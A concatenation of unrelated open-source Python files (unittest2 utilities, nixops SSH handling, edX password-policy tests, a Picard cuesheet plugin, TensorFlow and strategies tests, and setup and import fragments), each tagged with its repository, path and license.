'[?]', # 0xce
'[?]', # 0xcf
'', # 0xd0
'', # 0xd1
'', # 0xd2
'', # 0xd3
'', # 0xd4
'', # 0xd5
'', # 0xd6
'', # 0xd7
'', # 0xd8
'', # 0xd9
'', # 0xda
'', # 0xdb
'', # 0xdc
'', # 0xdd
'', # 0xde
'', # 0xdf
'', # 0xe0
'', # 0xe1
'', # 0xe2
'', # 0xe3
'[?]', # 0xe4
'', # 0xe5
'[?]', # 0xe6
'[?]', # 0xe7
'[?]', # 0xe8
'[?]', # 0xe9
'[?]', # 0xea
'[?]', # 0xeb
'[?]', # 0xec
'[?]', # 0xed
'[?]', # 0xee
'[?]', # 0xef
'[?]', # 0xf0
'[?]', # 0xf1
'[?]', # 0xf2
'[?]', # 0xf3
'[?]', # 0xf4
'[?]', # 0xf5
'[?]', # 0xf6
'[?]', # 0xf7
'[?]', # 0xf8
'[?]', # 0xf9
'[?]', # 0xfa
'[?]', # 0xfb
'[?]', # 0xfc
'[?]', # 0xfd
'[?]', # 0xfe
)
| gpl-2.0 |
XeLabs/tokudb | storage/ndb/mcc/tst/unittest2/util.py | 751 | 2821 | """Various utility functions."""
__unittest = True
_MAX_LENGTH = 80
def safe_repr(obj, short=False):
try:
result = repr(obj)
except Exception:
result = object.__repr__(obj)
if not short or len(result) < _MAX_LENGTH:
return result
return result[:_MAX_LENGTH] + ' [truncated]...'
def safe_str(obj):
try:
return str(obj)
except Exception:
return object.__str__(obj)
def strclass(cls):
return "%s.%s" % (cls.__module__, cls.__name__)
def sorted_list_difference(expected, actual):
"""Finds elements in only one or the other of two, sorted input lists.
Returns a two-element tuple of lists. The first list contains those
elements in the "expected" list but not in the "actual" list, and the
second contains those elements in the "actual" list but not in the
"expected" list. Duplicate elements in either input list are ignored.
"""
i = j = 0
missing = []
unexpected = []
while True:
try:
e = expected[i]
a = actual[j]
if e < a:
missing.append(e)
i += 1
while expected[i] == e:
i += 1
elif e > a:
unexpected.append(a)
j += 1
while actual[j] == a:
j += 1
else:
i += 1
try:
while expected[i] == e:
i += 1
finally:
j += 1
while actual[j] == a:
j += 1
except IndexError:
missing.extend(expected[i:])
unexpected.extend(actual[j:])
break
return missing, unexpected
def unorderable_list_difference(expected, actual, ignore_duplicate=False):
"""Same behavior as sorted_list_difference but
for lists of unorderable items (like dicts).
As it does a linear search per item (remove) it
has O(n*n) performance.
"""
missing = []
unexpected = []
while expected:
item = expected.pop()
try:
actual.remove(item)
except ValueError:
missing.append(item)
if ignore_duplicate:
for lst in expected, actual:
try:
while True:
lst.remove(item)
except ValueError:
pass
if ignore_duplicate:
while actual:
item = actual.pop()
unexpected.append(item)
try:
while True:
actual.remove(item)
except ValueError:
pass
return missing, unexpected
# anything left in actual is unexpected
return missing, actual
| gpl-2.0 |
Phreedom/nixops | nixops/ssh_util.py | 2 | 8022 | # -*- coding: utf-8 -*-
import os
import shlex
import subprocess
import weakref
import sys
from tempfile import mkdtemp
import nixops.util
__all__ = ['SSHConnectionFailed', 'SSHCommandFailed', 'SSH']
class SSHConnectionFailed(Exception):
pass
class SSHCommandFailed(nixops.util.CommandFailed):
pass
class SSHMaster(object):
def __init__(self, target, logger, ssh_flags, passwd):
self._tempdir = mkdtemp(prefix="nixops-tmp")
self._askpass_helper = None
self._control_socket = self._tempdir + "/ssh-master-socket"
self._ssh_target = target
pass_prompts = 0
kwargs = {}
additional_opts = []
if passwd is not None:
self._askpass_helper = self._make_askpass_helper()
newenv = dict(os.environ)
newenv.update({
'DISPLAY': ':666',
'SSH_ASKPASS': self._askpass_helper,
'NIXOPS_SSH_PASSWORD': passwd,
})
kwargs['env'] = newenv
kwargs['stdin'] = nixops.util.devnull
kwargs['preexec_fn'] = os.setsid
pass_prompts = 1
additional_opts = ['-oUserKnownHostsFile=/dev/null',
'-oStrictHostKeyChecking=no']
cmd = ["ssh", "-x", self._ssh_target, "-S",
self._control_socket, "-M", "-N", "-f",
'-oNumberOfPasswordPrompts={0}'.format(pass_prompts),
'-oServerAliveInterval=60'] + additional_opts
res = subprocess.call(cmd + ssh_flags, **kwargs)
if res != 0:
raise SSHConnectionFailed(
"unable to start SSH master connection to "
"‘{0}’".format(target)
)
self.opts = ["-oControlPath={0}".format(self._control_socket)]
def _make_askpass_helper(self):
"""
Create a SSH_ASKPASS helper script, which just outputs the contents of
the environment variable NIXOPS_SSH_PASSWORD.
"""
path = os.path.join(self._tempdir, 'nixops-askpass-helper')
fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_NOFOLLOW, 0700)
os.write(fd, """#!{0}
import sys
import os
sys.stdout.write(os.environ['NIXOPS_SSH_PASSWORD'])""".format(sys.executable))
os.close(fd)
return path
def shutdown(self):
"""
Shutdown master process and clean up temporary files.
"""
subprocess.call(["ssh", self._ssh_target, "-S",
self._control_socket, "-O", "exit"],
stderr=nixops.util.devnull)
for to_unlink in (self._askpass_helper, self._control_socket):
if to_unlink is None:
continue
try:
os.unlink(to_unlink)
except OSError:
pass
try:
os.rmdir(self._tempdir)
except OSError:
pass
def __del__(self):
self.shutdown()
class SSH(object):
def __init__(self, logger):
"""
Initialize a SSH object with the specified Logger instance, which will
be used to write SSH output to.
"""
self._flag_fun = lambda: []
self._host_fun = None
self._passwd_fun = lambda: None
self._logger = logger
self._ssh_master = None
def register_host_fun(self, host_fun):
"""
Register a function which returns the hostname or IP to connect to. The
function has to require no arguments.
"""
self._host_fun = host_fun
def _get_target(self):
if self._host_fun is None:
raise AssertionError("don't know which SSH host to connect to")
return "root@{0}".format(self._host_fun())
def register_flag_fun(self, flag_fun):
"""
Register a function that is used for obtaining additional SSH flags.
The function has to require no arguments and should return a list of
strings, each being a SSH flag/argument.
"""
self._flag_fun = flag_fun
def _get_flags(self):
return self._flag_fun()
def register_passwd_fun(self, passwd_fun):
"""
Register a function that returns either a string or None and requires
no arguments. If the return value is a string, the returned string is
used for keyboard-interactive authentication, if it is None, no attempt
is made to inject a password.
"""
self._passwd_fun = passwd_fun
def _get_passwd(self):
return self._passwd_fun()
def reset(self):
"""
Reset SSH master connection.
"""
if self._ssh_master is not None:
self._ssh_master.shutdown()
self._ssh_master = None
def get_master(self, flags=[], tries=5):
"""
Start (if necessary) an SSH master connection to speed up subsequent
SSH sessions. Returns the SSHMaster instance on success.
"""
flags = flags + self._get_flags()
if self._ssh_master is not None:
return weakref.proxy(self._ssh_master)
while True:
try:
self._ssh_master = SSHMaster(self._get_target(), self._logger,
flags, self._get_passwd())
break
except Exception:
tries = tries - 1
if tries == 0:
raise
pass
return weakref.proxy(self._ssh_master)
def _sanitize_command(self, command, allow_ssh_args):
"""
Helper method for run_command, which essentially prepares and properly
escape the command. See run_command() for further description.
"""
if isinstance(command, basestring):
if allow_ssh_args:
return shlex.split(command)
else:
return ['--', command]
# iterable
elif allow_ssh_args:
return command
else:
return ['--', ' '.join(["'{0}'".format(arg.replace("'", r"'\''"))
for arg in command])]
def run_command(self, command, flags=[], timeout=None, logged=True,
allow_ssh_args=False, **kwargs):
"""
Execute a 'command' on the current target host using SSH, passing
'flags' as additional arguments to SSH. The command can be either a
string or an iterable of strings, whereby if it's the latter, it will
be joined with spaces and properly shell-escaped.
If 'allow_ssh_args' is set to True, the specified command may contain
SSH flags.
All keyword arguments except timeout are passed as-is to
nixops.util.logged_exec(), though if you set 'logged' to False, the
keyword arguments are passed as-is to subprocess.call() and the command
is executed interactively with no logging.
'timeout' specifies the SSH connection timeout.
"""
tries = 5
if timeout is not None:
flags = flags + ["-o", "ConnectTimeout={0}".format(timeout)]
tries = 1
master = self.get_master(flags, tries)
flags = flags + self._get_flags()
if logged:
flags.append("-x")
cmd = ["ssh"] + master.opts + flags
cmd.append(self._get_target())
cmd += self._sanitize_command(command, allow_ssh_args)
if logged:
try:
return nixops.util.logged_exec(cmd, self._logger, **kwargs)
except nixops.util.CommandFailed as exc:
raise SSHCommandFailed(exc.message, exc.exitcode)
else:
check = kwargs.pop('check', True)
res = subprocess.call(cmd, **kwargs)
if check and res != 0:
msg = "command ‘{0}’ failed on host ‘{1}’"
err = msg.format(cmd, self._get_target())
raise SSHCommandFailed(err, res)
else:
return res
| lgpl-3.0 |
caesar2164/edx-platform | common/djangoapps/student/tests/test_password_policy.py | 10 | 12721 | # -*- coding: utf-8 -*-
"""
This test file will verify proper password policy enforcement, which is an option feature
"""
import json
from django.test import TestCase
from django.test.client import RequestFactory
from django.core.urlresolvers import reverse
from django.contrib.auth.models import AnonymousUser
from importlib import import_module
from django.test.utils import override_settings
from django.conf import settings
from mock import patch
from openedx.core.djangoapps.external_auth.models import ExternalAuthMap
from student.views import create_account
@patch.dict("django.conf.settings.FEATURES", {'ENFORCE_PASSWORD_POLICY': True})
class TestPasswordPolicy(TestCase):
"""
Go through some password policy tests to make sure things are properly working
"""
def setUp(self):
super(TestPasswordPolicy, self).setUp()
self.url = reverse('create_account')
self.request_factory = RequestFactory()
self.url_params = {
'username': 'username',
'email': 'foo_bar@bar.com',
'name': 'username',
'terms_of_service': 'true',
'honor_code': 'true',
}
@override_settings(PASSWORD_MIN_LENGTH=6)
def test_password_length_too_short(self):
self.url_params['password'] = 'aaa'
response = self.client.post(self.url, self.url_params)
self.assertEqual(response.status_code, 400)
obj = json.loads(response.content)
self.assertEqual(
obj['value'],
"Password: Invalid Length (must be 6 characters or more)",
)
@override_settings(PASSWORD_MIN_LENGTH=6)
def test_password_length_long_enough(self):
self.url_params['password'] = 'ThisIsALongerPassword'
response = self.client.post(self.url, self.url_params)
self.assertEqual(response.status_code, 200)
obj = json.loads(response.content)
self.assertTrue(obj['success'])
@override_settings(PASSWORD_MAX_LENGTH=12)
def test_password_length_too_long(self):
self.url_params['password'] = 'ThisPasswordIsWayTooLong'
response = self.client.post(self.url, self.url_params)
self.assertEqual(response.status_code, 400)
obj = json.loads(response.content)
self.assertEqual(
obj['value'],
"Password: Invalid Length (must be 12 characters or fewer)",
)
@patch.dict("django.conf.settings.PASSWORD_COMPLEXITY", {'UPPER': 3})
def test_password_not_enough_uppercase(self):
self.url_params['password'] = 'thisshouldfail'
response = self.client.post(self.url, self.url_params)
self.assertEqual(response.status_code, 400)
obj = json.loads(response.content)
self.assertEqual(
obj['value'],
"Password: Must be more complex (must contain 3 or more uppercase characters)",
)
@patch.dict("django.conf.settings.PASSWORD_COMPLEXITY", {'UPPER': 3})
def test_password_enough_uppercase(self):
self.url_params['password'] = 'ThisShouldPass'
response = self.client.post(self.url, self.url_params)
self.assertEqual(response.status_code, 200)
obj = json.loads(response.content)
self.assertTrue(obj['success'])
@patch.dict("django.conf.settings.PASSWORD_COMPLEXITY", {'LOWER': 3})
def test_password_not_enough_lowercase(self):
self.url_params['password'] = 'THISSHOULDFAIL'
response = self.client.post(self.url, self.url_params)
self.assertEqual(response.status_code, 400)
obj = json.loads(response.content)
self.assertEqual(
obj['value'],
"Password: Must be more complex (must contain 3 or more lowercase characters)",
)
@patch.dict("django.conf.settings.PASSWORD_COMPLEXITY", {'LOWER': 3})
def test_password_enough_lowercase(self):
self.url_params['password'] = 'ThisShouldPass'
response = self.client.post(self.url, self.url_params)
self.assertEqual(response.status_code, 200)
obj = json.loads(response.content)
self.assertTrue(obj['success'])
@patch.dict("django.conf.settings.PASSWORD_COMPLEXITY", {'DIGITS': 3})
def test_not_enough_digits(self):
self.url_params['password'] = 'thishasnodigits'
response = self.client.post(self.url, self.url_params)
self.assertEqual(response.status_code, 400)
obj = json.loads(response.content)
self.assertEqual(
obj['value'],
"Password: Must be more complex (must contain 3 or more digits)",
)
@patch.dict("django.conf.settings.PASSWORD_COMPLEXITY", {'DIGITS': 3})
def test_enough_digits(self):
self.url_params['password'] = 'Th1sSh0uldPa88'
response = self.client.post(self.url, self.url_params)
self.assertEqual(response.status_code, 200)
obj = json.loads(response.content)
self.assertTrue(obj['success'])
@patch.dict("django.conf.settings.PASSWORD_COMPLEXITY", {'PUNCTUATION': 3})
def test_not_enough_punctuations(self):
self.url_params['password'] = 'thisshouldfail'
response = self.client.post(self.url, self.url_params)
self.assertEqual(response.status_code, 400)
obj = json.loads(response.content)
self.assertEqual(
obj['value'],
"Password: Must be more complex (must contain 3 or more punctuation characters)",
)
@patch.dict("django.conf.settings.PASSWORD_COMPLEXITY", {'PUNCTUATION': 3})
def test_enough_punctuations(self):
self.url_params['password'] = 'Th!sSh.uldPa$*'
response = self.client.post(self.url, self.url_params)
self.assertEqual(response.status_code, 200)
obj = json.loads(response.content)
self.assertTrue(obj['success'])
@patch.dict("django.conf.settings.PASSWORD_COMPLEXITY", {'WORDS': 3})
def test_not_enough_words(self):
self.url_params['password'] = 'thisshouldfail'
response = self.client.post(self.url, self.url_params)
self.assertEqual(response.status_code, 400)
obj = json.loads(response.content)
self.assertEqual(
obj['value'],
"Password: Must be more complex (must contain 3 or more unique words)",
)
@patch.dict("django.conf.settings.PASSWORD_COMPLEXITY", {'WORDS': 3})
def test_enough_wordss(self):
self.url_params['password'] = u'this should pass'
response = self.client.post(self.url, self.url_params)
self.assertEqual(response.status_code, 200)
obj = json.loads(response.content)
self.assertTrue(obj['success'])
@patch.dict("django.conf.settings.PASSWORD_COMPLEXITY", {
'PUNCTUATION': 3,
'WORDS': 3,
'DIGITS': 3,
'LOWER': 3,
'UPPER': 3,
})
def test_multiple_errors_fail(self):
self.url_params['password'] = 'thisshouldfail'
response = self.client.post(self.url, self.url_params)
self.assertEqual(response.status_code, 400)
obj = json.loads(response.content)
errstring = (
"Password: Must be more complex ("
"must contain 3 or more uppercase characters, "
"must contain 3 or more digits, "
"must contain 3 or more punctuation characters, "
"must contain 3 or more unique words"
")"
)
self.assertEqual(obj['value'], errstring)
@patch.dict("django.conf.settings.PASSWORD_COMPLEXITY", {
'PUNCTUATION': 3,
'WORDS': 3,
'DIGITS': 3,
'LOWER': 3,
'UPPER': 3,
})
def test_multiple_errors_pass(self):
self.url_params['password'] = u'tH1s Sh0u!d P3#$'
response = self.client.post(self.url, self.url_params)
self.assertEqual(response.status_code, 200)
obj = json.loads(response.content)
self.assertTrue(obj['success'])
@override_settings(PASSWORD_DICTIONARY=['foo', 'bar'])
@override_settings(PASSWORD_DICTIONARY_EDIT_DISTANCE_THRESHOLD=1)
def test_dictionary_similarity_fail1(self):
self.url_params['password'] = 'foo'
response = self.client.post(self.url, self.url_params)
self.assertEqual(response.status_code, 400)
obj = json.loads(response.content)
self.assertEqual(
obj['value'],
"Password: Too similar to a restricted dictionary word.",
)
@override_settings(PASSWORD_DICTIONARY=['foo', 'bar'])
@override_settings(PASSWORD_DICTIONARY_EDIT_DISTANCE_THRESHOLD=1)
def test_dictionary_similarity_fail2(self):
self.url_params['password'] = 'bar'
response = self.client.post(self.url, self.url_params)
self.assertEqual(response.status_code, 400)
obj = json.loads(response.content)
self.assertEqual(
obj['value'],
"Password: Too similar to a restricted dictionary word.",
)
@override_settings(PASSWORD_DICTIONARY=['foo', 'bar'])
@override_settings(PASSWORD_DICTIONARY_EDIT_DISTANCE_THRESHOLD=1)
def test_dictionary_similarity_fail3(self):
self.url_params['password'] = 'fo0'
response = self.client.post(self.url, self.url_params)
self.assertEqual(response.status_code, 400)
obj = json.loads(response.content)
self.assertEqual(
obj['value'],
"Password: Too similar to a restricted dictionary word.",
)
@override_settings(PASSWORD_DICTIONARY=['foo', 'bar'])
@override_settings(PASSWORD_DICTIONARY_EDIT_DISTANCE_THRESHOLD=1)
def test_dictionary_similarity_pass(self):
self.url_params['password'] = 'this_is_ok'
response = self.client.post(self.url, self.url_params)
self.assertEqual(response.status_code, 200)
obj = json.loads(response.content)
self.assertTrue(obj['success'])
def test_with_unicode(self):
self.url_params['password'] = u'四節比分和七年前'
response = self.client.post(self.url, self.url_params)
self.assertEqual(response.status_code, 200)
obj = json.loads(response.content)
self.assertTrue(obj['success'])
@override_settings(PASSWORD_MIN_LENGTH=6, SESSION_ENGINE='django.contrib.sessions.backends.cache')
def test_ext_auth_password_length_too_short(self):
"""
Tests that even if password policy is enforced, ext_auth registrations aren't subject to it
"""
self.url_params['password'] = 'aaa' # shouldn't pass validation
request = self.request_factory.post(self.url, self.url_params)
# now indicate we are doing ext_auth by setting 'ExternalAuthMap' in the session.
request.session = import_module(settings.SESSION_ENGINE).SessionStore() # empty session
extauth = ExternalAuthMap(external_id='withmap@stanford.edu',
external_email='withmap@stanford.edu',
internal_password=self.url_params['password'],
external_domain='shib:https://idp.stanford.edu/')
request.session['ExternalAuthMap'] = extauth
request.user = AnonymousUser()
with patch('edxmako.request_context.get_current_request', return_value=request):
response = create_account(request)
self.assertEqual(response.status_code, 200)
obj = json.loads(response.content)
self.assertTrue(obj['success'])
class TestUsernamePasswordNonmatch(TestCase):
"""
Test that registration username and password fields differ
"""
def setUp(self):
super(TestUsernamePasswordNonmatch, self).setUp()
self.url = reverse('create_account')
self.url_params = {
'username': 'username',
'email': 'foo_bar@bar.com',
'name': 'username',
'terms_of_service': 'true',
'honor_code': 'true',
}
def test_with_username_password_match(self):
self.url_params['username'] = "foobar"
self.url_params['password'] = "foobar"
response = self.client.post(self.url, self.url_params)
self.assertEquals(response.status_code, 400)
obj = json.loads(response.content)
self.assertEqual(
obj['value'],
"Username and password fields cannot match",
)
def test_with_username_password_nonmatch(self):
self.url_params['username'] = "foobar"
self.url_params['password'] = "nonmatch"
response = self.client.post(self.url, self.url_params)
self.assertEquals(response.status_code, 200)
obj = json.loads(response.content)
self.assertTrue(obj['success'])
| agpl-3.0 |
mwiencek/picard | contrib/plugins/cuesheet.py | 3 | 6597 | # -*- coding: utf-8 -*-
PLUGIN_NAME = u"Generate Cuesheet"
PLUGIN_AUTHOR = u"Lukáš Lalinský"
PLUGIN_DESCRIPTION = "Generate cuesheet (.cue file) from an album."
PLUGIN_VERSION = "0.1"
PLUGIN_API_VERSIONS = ["0.10", "0.15"]
import os.path
import re
from PyQt4 import QtCore, QtGui
from picard.util import find_existing_path, encode_filename
from picard.ui.itemviews import BaseAction, register_album_action
_whitespace_re = re.compile('\s', re.UNICODE)
_split_re = re.compile('\s*("[^"]*"|[^ ]+)\s*', re.UNICODE)
def msfToMs(msf):
msf = msf.split(":")
return ((int(msf[0]) * 60 + int(msf[1])) * 75 + int(msf[2])) * 1000 / 75
class CuesheetTrack(list):
def __init__(self, cuesheet, index):
list.__init__(self)
self.cuesheet = cuesheet
self.index = index
def set(self, *args):
self.append(args)
def find(self, prefix):
return [i for i in self if tuple(i[:len(prefix)]) == tuple(prefix)]
def getTrackNumber(self):
return self.index
def getLength(self):
try:
nextTrack = self.cuesheet.tracks[self.index+1]
index0 = self.find((u"INDEX",u"01"))
index1 = nextTrack.find((u"INDEX",u"01"))
return msfToMs(index1[0][2]) - msfToMs(index0[0][2])
except IndexError:
return 0
def getField(self, prefix):
try:
return self.find(prefix)[0][len(prefix)]
except IndexError:
return u""
def getArtist(self):
return self.getField((u"PERFORMER",))
def getTitle(self):
return self.getField((u"TITLE",))
def setArtist(self, artist):
found = False
for item in self:
if item[0] == u"PERFORMER":
if not found:
item[1] = artist
found = True
else:
del item
if not found:
self.append((u"PERFORMER", artist))
artist = property(getArtist, setArtist)
class Cuesheet(object):
def __init__(self, filename):
self.filename = filename
self.tracks = []
def read(self):
f = open(encode_filename(self.filename))
self.parse(f.readlines())
f.close()
def unquote(self, string):
if string.startswith('"'):
if string.endswith('"'):
return string[1:-1]
else:
return string[1:]
return string
def quote(self, string):
if _whitespace_re.search(string):
return '"' + string.replace('"', '\'') + '"'
return string
def parse(self, lines):
track = CuesheetTrack(self, 0)
self.tracks = [track]
isUnicode = False
for line in lines:
# remove BOM
if line.startswith('\xfe\xff'):
isUnicode = True
line = line[1:]
# decode to unicode string
line = line.strip()
if isUnicode:
line = line.decode('UTF-8', 'replace')
else:
line = line.decode('ISO-8859-1', 'replace')
# parse the line
split = [self.unquote(s) for s in _split_re.findall(line)]
keyword = split[0].upper()
if keyword == 'TRACK':
trackNum = int(split[1])
track = CuesheetTrack(self, trackNum)
self.tracks.append(track)
track.append(split)
def write(self):
lines = []
for track in self.tracks:
num = track.index
for line in track:
indent = 0
if num > 0:
if line[0] == "TRACK":
indent = 2
elif line[0] != "FILE":
indent = 4
line2 = u" ".join([self.quote(s) for s in line])
lines.append(" " * indent + line2.encode("UTF-8") + "\n")
f = open(encode_filename(self.filename), "wt")
f.writelines(lines)
f.close()
class GenerateCuesheet(BaseAction):
NAME = "Generate &Cuesheet..."
def callback(self, objs):
album = objs[0]
current_directory = self.config.persist["current_directory"] or QtCore.QDir.homePath()
current_directory = find_existing_path(unicode(current_directory))
selected_format = QtCore.QString()
filename = QtGui.QFileDialog.getSaveFileName(None, "", current_directory, "Cuesheet (*.cue)", selected_format)
if filename:
filename = unicode(filename)
cuesheet = Cuesheet(filename)
#try: cuesheet.read()
#except IOError: pass
while len(cuesheet.tracks) <= len(album.tracks):
track = CuesheetTrack(cuesheet, len(cuesheet.tracks))
cuesheet.tracks.append(track)
#if len(cuesheet.tracks) > len(album.tracks) - 1:
# cuesheet.tracks = cuesheet.tracks[0:len(album.tracks)+1]
t = cuesheet.tracks[0]
t.set("PERFORMER", album.metadata["albumartist"])
t.set("TITLE", album.metadata["album"])
t.set("REM", "MUSICBRAINZ_ALBUM_ID", album.metadata["musicbrainz_albumid"])
t.set("REM", "MUSICBRAINZ_ALBUM_ARTIST_ID", album.metadata["musicbrainz_albumartistid"])
if "date" in album.metadata:
t.set("REM", "DATE", album.metadata["date"])
index = 0.0
for i, track in enumerate(album.tracks):
mm = index / 60.0
ss = (mm - int(mm)) * 60.0
ff = (ss - int(ss)) * 75.0
index += track.metadata.length / 1000.0
t = cuesheet.tracks[i + 1]
t.set("TRACK", "%02d" % (i + 1), "AUDIO")
t.set("PERFORMER", track.metadata["artist"])
t.set("TITLE", track.metadata["title"])
t.set("REM", "MUSICBRAINZ_TRACK_ID", track.metadata["musicbrainz_trackid"])
t.set("REM", "MUSICBRAINZ_ARTIST_ID", track.metadata["musicbrainz_artistid"])
t.set("INDEX", "01", "%02d:%02d:%02d" % (mm, ss, ff))
for file in track.linked_files:
audio_filename = file.filename
if os.path.dirname(filename) == os.path.dirname(audio_filename):
audio_filename = os.path.basename(audio_filename)
cuesheet.tracks[i].set("FILE", audio_filename, "MP3")
cuesheet.write()
action = GenerateCuesheet()
register_album_action(action)
| gpl-2.0 |
ibab/tensorflow | tensorflow/contrib/tensor_forest/python/kernel_tests/tree_predictions_op_test.py | 8 | 3754 | # Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf.contrib.tensor_forest.ops.tree_predictions_op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow # pylint: disable=unused-import
from tensorflow.contrib.tensor_forest.python.ops import inference_ops
from tensorflow.python.framework import test_util
from tensorflow.python.platform import googletest
class TreePredictionsTest(test_util.TensorFlowTestCase):
def setUp(self):
self.ops = inference_ops.Load()
def testSimple(self):
input_data = [[-1., 0.], [-1., 2.], # node 1
[1., 0.], [1., -2.]] # node 2
tree = [[1, 0], [-1, 0], [-1, 0]]
tree_thresholds = [0., 0., 0.]
node_pcw = [[1.0, 0.3, 0.4, 0.3], [1.0, 0.1, 0.1, 0.8],
[1.0, 0.5, 0.25, 0.25]]
with self.test_session():
predictions = self.ops.tree_predictions(
input_data, tree, tree_thresholds, node_pcw,
valid_leaf_threshold=1)
self.assertAllClose([[0.1, 0.1, 0.8], [0.1, 0.1, 0.8],
[0.5, 0.25, 0.25], [0.5, 0.25, 0.25]],
predictions.eval())
def testBackoffToParent(self):
input_data = [[-1., 0.], [-1., 2.], # node 1
[1., 0.], [1., -2.]] # node 2
tree = [[1, 0], [-1, 0], [-1, 0]]
tree_thresholds = [0., 0., 0.]
node_pcw = [[15.0, 3.0, 9.0, 3.0], [5.0, 1.0, 1.0, 3.0],
[25.0, 5.0, 20.0, 0.0]]
with self.test_session():
predictions = self.ops.tree_predictions(
input_data, tree, tree_thresholds, node_pcw,
valid_leaf_threshold=10)
# Node 2 has enough data, but Node 1 needs to combine with the parent
# counts.
self.assertAllClose([[0.2, 0.4, 0.4], [0.2, 0.4, 0.4],
[0.2, 0.8, 0.0], [0.2, 0.8, 0.0]],
predictions.eval())
def testNoInput(self):
input_data = []
tree = [[1, 0], [-1, 0], [-1, 0]]
tree_thresholds = [0., 0., 0.]
node_pcw = [[1.0, 0.3, 0.4, 0.3], [1.0, 0.1, 0.1, 0.8],
[1.0, 0.5, 0.25, 0.25]]
with self.test_session():
predictions = self.ops.tree_predictions(
input_data, tree, tree_thresholds, node_pcw,
valid_leaf_threshold=10)
self.assertEquals((0, 3), predictions.eval().shape)
def testBadInput(self):
input_data = [[-1., 0.], [-1., 2.], # node 1
[1., 0.], [1., -2.]] # node 2
tree = [[1, 0], [-1, 0], [-1, 0]]
tree_thresholds = [0., 0.] # not enough nodes.
node_pcw = [[1.0, 0.3, 0.4, 0.3], [1.0, 0.1, 0.1, 0.8],
[1.0, 0.5, 0.25, 0.25]]
with self.test_session():
with self.assertRaisesOpError(
'Number of nodes should be the same in tree, tree_thresholds '
'and node_pcw.'):
predictions = self.ops.tree_predictions(
input_data, tree, tree_thresholds, node_pcw,
valid_leaf_threshold=10)
self.assertEquals((0, 3), predictions.eval().shape)
if __name__ == '__main__':
googletest.main()
| apache-2.0 |
logpy/strategies | strategies/tests/test_core.py | 1 | 1841 | from strategies.core import (exhaust, memoize, condition,
chain, do_one, debug, switch, minimize, null_safe)
from functools import partial
def test_null_safe():
def rl(expr):
if expr == 1:
return 2
safe_rl = null_safe(rl)
assert rl(1) == safe_rl(1)
assert rl(3) == None
assert safe_rl(3) == 3
def posdec(x):
if x > 0:
return x-1
else:
return x
def test_exhaust():
sink = exhaust(posdec)
assert sink(5) == 0
assert sink(10) == 0
def test_memoize():
rl = memoize(posdec)
assert rl(5) == posdec(5)
assert rl(5) == posdec(5)
assert rl(-2) == posdec(-2)
def test_condition():
rl = condition(lambda x: x%2 == 0, posdec)
assert rl(5) == 5
assert rl(4) == 3
def test_chain():
rl = chain([posdec, posdec])
assert rl(5) == 3
assert rl(1) == 0
def test_do_one():
rl = do_one([posdec, posdec])
assert rl(5) == 4
def test_debug():
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
file = StringIO()
rl = debug(posdec, file)
rl(5)
log = file.getvalue()
file.close()
assert posdec.__name__ in log
assert '5' in log
assert '4' in log
def test_switch():
inc = lambda x: x + 1
dec = lambda x: x - 1
key = lambda x: x % 3
rl = switch(key, {0: inc, 1: dec})
assert rl(3) == 4
assert rl(4) == 3
assert rl(5) == 5
def test_minimize():
inc = lambda x: x + 1
dec = lambda x: x - 1
rl = minimize([inc, dec])
assert rl(4) == 3
rl = minimize([inc, dec], objective=lambda x: -x)
assert rl(4) == 5
def test_do_one():
rl1 = lambda x: 2 if x == 1 else x
rl2 = lambda x: 3 if x == 2 else x
rule = do_one([rl1, rl2])
assert rule(1) == 2
assert rule(rule(1)) == 3
| bsd-3-clause |
sekimura/pyscard | smartcard/Examples/wx/readerviewer/setup.py | 2 | 1433 | #! /usr/bin/env python
"""
Setup script to build a standalone readerviewer.exe executable on windows
using py2exe. Run: python.exe setup.py py2exe, to build executable file.
__author__ = "http://www.gemalto.com"
Copyright 2001-2010 gemalto
Author: Jean-Daniel Aussel, mailto:jean-daniel.aussel@gemalto.com
This file is part of pyscard.
pyscard is free software; you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation; either version 2.1 of the License, or
(at your option) any later version.
pyscard is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with pyscard; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
from distutils.core import setup
import py2exe
from smartcard.wx import ICO_SMARTCARD, ICO_READER
Mydata_files = [('images', ['images/readerviewer.ico', ICO_SMARTCARD, ICO_READER ])]
setup( windows=['readerviewer.py'],
data_files = Mydata_files,
options =
{
"py2exe":{"dll_excludes":["MSVCP90.dll"]}
}
)
| lgpl-2.1 |
umlfri/umlfri2 | umlfri2/qtgui/canvas/canvaswidget.py | 1 | 12931 | from PyQt5.QtCore import Qt, QSize
from PyQt5.QtGui import QPainter, QContextMenuEvent, QKeySequence
from PyQt5.QtWidgets import QWidget, QApplication, QShortcut
from umlfri2.application import Application
from umlfri2.application.commands.diagram import ShowElementCommand, ChangeZOrderCommand, ZOrderDirection, \
HideElementsCommand, HideConnectionCommand
from umlfri2.application.commands.model import DeleteElementsCommand, DeleteConnectionCommand
from umlfri2.application.drawingarea import DrawingAreaCursor
from umlfri2.application.events.application import ZoomChangedEvent
from umlfri2.application.events.diagram import DiagramChangedEvent, SelectionChangedEvent
from umlfri2.application.events.model import ObjectDataChangedEvent, ConnectionChangedEvent, ElementCreatedEvent, \
ElementDeletedEvent, NodeMovedEvent
from umlfri2.application.events.solution import MetamodelConfigChangedEvent
from umlfri2.constants.keys import DELETE_FROM_PROJECT, Z_ORDER_RAISE, Z_ORDER_LOWER, Z_ORDER_TO_BOTTOM, Z_ORDER_TO_TOP
from umlfri2.metamodel import DefaultElementAction
from umlfri2.model import ElementObject
from umlfri2.model.element import ElementVisual
from umlfri2.types.geometry import Point
